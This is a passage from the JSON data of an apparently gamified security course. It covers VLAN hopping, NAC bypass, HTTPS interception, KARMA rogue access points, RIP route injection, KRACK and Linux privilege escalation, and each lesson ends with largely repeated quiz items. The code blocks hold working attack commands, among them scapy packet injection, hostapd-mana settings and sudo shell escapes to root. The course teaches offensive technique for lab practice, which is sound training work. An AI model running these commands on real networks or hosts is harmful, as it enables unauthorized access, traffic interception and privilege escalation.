at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-vlan-hopping2","cat":"Network Attacks","title":"VLAN Hopping Techniques","diff":3,"xp":200,"intro":"Jump between VLANs to access restricted network segments.","sections":[{"type":"text","content":"VLAN hopping: negotiate a trunk (DTP spoofing) or use double-tagging to send frames to a different VLAN through the native VLAN."},{"type":"code","lang":"bash","content":"# DTP trunk negotiation\nyersinia dtp -attack 1 -interface eth0\n# Double tagging\nscapy: sendp(Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst='target')/ICMP())\n# Defense: disable DTP, set native VLAN, use private VLANs"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Double VLAN tagging exploits...","opts":["Trunk negotiation","The native VLAN stripping behavior on the first switch","MAC flooding","ARP spoofing"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-nac-bypass2","cat":"Network Attacks","title":"Network Access Control Bypass","diff":4,"xp":250,"intro":"Bypass 802.1X and NAC to gain network access.","sections":[{"type":"text","content":"Bypass NAC: clone an authorized device's MAC, use a transparent bridge, exploit MAB fallback, or capture and replay EAP sessions."},{"type":"code","lang":"bash","content":"# MAC cloning\nmacchanger -m AA:BB:CC:DD:EE:FF eth0\n# Transparent bridge\nbrctl addbr br0 && brctl addif br0 eth0 eth1 && ifconfig br0 up\n# MAB bypass (MAC Authentication Bypass)\n# If the switch falls back to MAB when 802.1X fails\n# Clone an authorized MAC and skip 802.1X"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"MAC cloning bypasses NAC when...","opts":["802.1X is enforced","The switch uses MAC-based authentication (MAB) fallback","The network is encrypted","NAC is disabled"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-mitm-https2","cat":"Network Attacks","title":"HTTPS Interception with Proxy","diff":2,"xp":150,"intro":"Intercept HTTPS traffic by installing a CA certificate.","sections":[{"type":"text","content":"Install your CA certificate on the target device. Now your proxy decrypts, inspects, and re-encrypts all HTTPS traffic transparently."},{"type":"code","lang":"bash","content":"# Generate CA cert\nopenssl req -new -x509 -days 365 -nodes -out ca.pem -keyout ca-key.pem\n# Install on target device (browser/OS trust store)\n# Run mitmproxy with the CA\nmitmproxy --cert ca.pem\n# Or Burp Suite: import CA from http://burpsuite:8080/cert"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"HTTPS interception requires the victim to...","opts":["Use HTTP instead","Trust the attacker's CA certificate","Disable their firewall","Use a specific browser"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-wifi-karma","cat":"Network Attacks","title":"WiFi KARMA Attack","diff":3,"xp":200,"intro":"Automatically create fake APs for every SSID a device requests.","sections":[{"type":"text","content":"KARMA responds to all probe requests with 'Yes, I am that network!'. Every device nearby connects to you, thinking they found their saved network."},{"type":"code","lang":"bash","content":"# hostapd-mana with KARMA\nhostapd-mana mana.conf\n# mana.conf:\ninterface=wlan0\nssid=FreeWiFi\nenable_mana=1\nmana_loud=1\n# All devices probing for any SSID will connect to you"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"KARMA attack responds to...","opts":["Only specific SSIDs","Every probe request, pretending to be any requested network","Only open networks","Only WPA networks"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-routing-protocol-attack","cat":"Network Attacks","title":"Routing Protocol Attacks","diff":4,"xp":250,"intro":"Inject false routes into OSPF, BGP, or RIP to redirect traffic.","sections":[{"type":"text","content":"If you can join a routing domain (OSPF, RIP), inject routes pointing traffic through your machine. BGP hijacking redirects entire IP prefixes."},{"type":"code","lang":"bash","content":"# RIP injection (no authentication by default)\nscapy: send(IP(dst='224.0.0.9')/UDP(dport=520)/RIP(cmd=2)/RIPEntry(addr='10.0.0.0',mask='255.0.0.0',nexthop='attacker_ip'))\n# OSPF (if area has no authentication)\n# BGP hijacking: announce more-specific prefix"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Routing protocol attacks redirect traffic by...","opts":["Modifying DNS","Injecting false routes into the routing table","ARP spoofing","DHCP starvation"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-wifi-krack","cat":"Network Attacks","title":"KRACK Attack on WPA2","diff":4,"xp":250,"intro":"Exploit key reinstallation in the 4-way handshake.","sections":[{"type":"text","content":"KRACK forces nonce reuse in WPA2's 4-way handshake by replaying message 3. This resets the encryption key counter, allowing packet decryption and injection."},{"type":"code","lang":"bash","content":"# KRACK attack tool\npython3 krackattack.py -i wlan0mon --target CLIENT_MAC --ap AP_MAC\n# Patches: most vendors patched in 2017-2018\n# Check if patched:\n# Updated wpa_supplicant/hostapd prevents reinstallation"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"KRACK exploits...","opts":["Weak passwords","Nonce reuse from replaying handshake message 3","WPS","WEP"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"pe-find-suid","cat":"Privilege Escalation","title":"Finding SUID Binaries","diff":1,"xp":50,"intro":"Find files with the SUID bit set for potential escalation.","sections":[{"type":"text","content":"SUID binaries run as their owner (often root). Find them all, then check GTFOBins for known exploitation techniques."},{"type":"code","lang":"bash","content":"find / -perm -4000 -type f 2>/dev/null\nfind / -perm -2000 -type f 2>/dev/null  # SGID\nfind / -perm -4000 -user root -type f 2>/dev/null"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"SUID binaries run as...","opts":["The current user","The file owner (often root)","Nobody","The group owner"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-sudo-list","cat":"Privilege Escalation","title":"Sudo Privilege Enumeration","diff":1,"xp":50,"intro":"Check what you can run as root with sudo.","sections":[{"type":"text","content":"sudo -l shows your sudo privileges. Many allowed commands can spawn shells or read/write files as root."},{"type":"code","lang":"bash","content":"sudo -l\n# Common exploitable entries:\n# (root) NOPASSWD: /usr/bin/vim -> sudo vim -c ':!bash'\n# (root) NOPASSWD: /usr/bin/find -> sudo find / -exec /bin/bash ;\n# (root) NOPASSWD: /usr/bin/python3 -> sudo python3 -c 'import os; os.system(\"/bin/bash\")'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"sudo -l shows...","opts":["All system users","Commands you can run with elevated privileges","Open ports","Running processes"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File 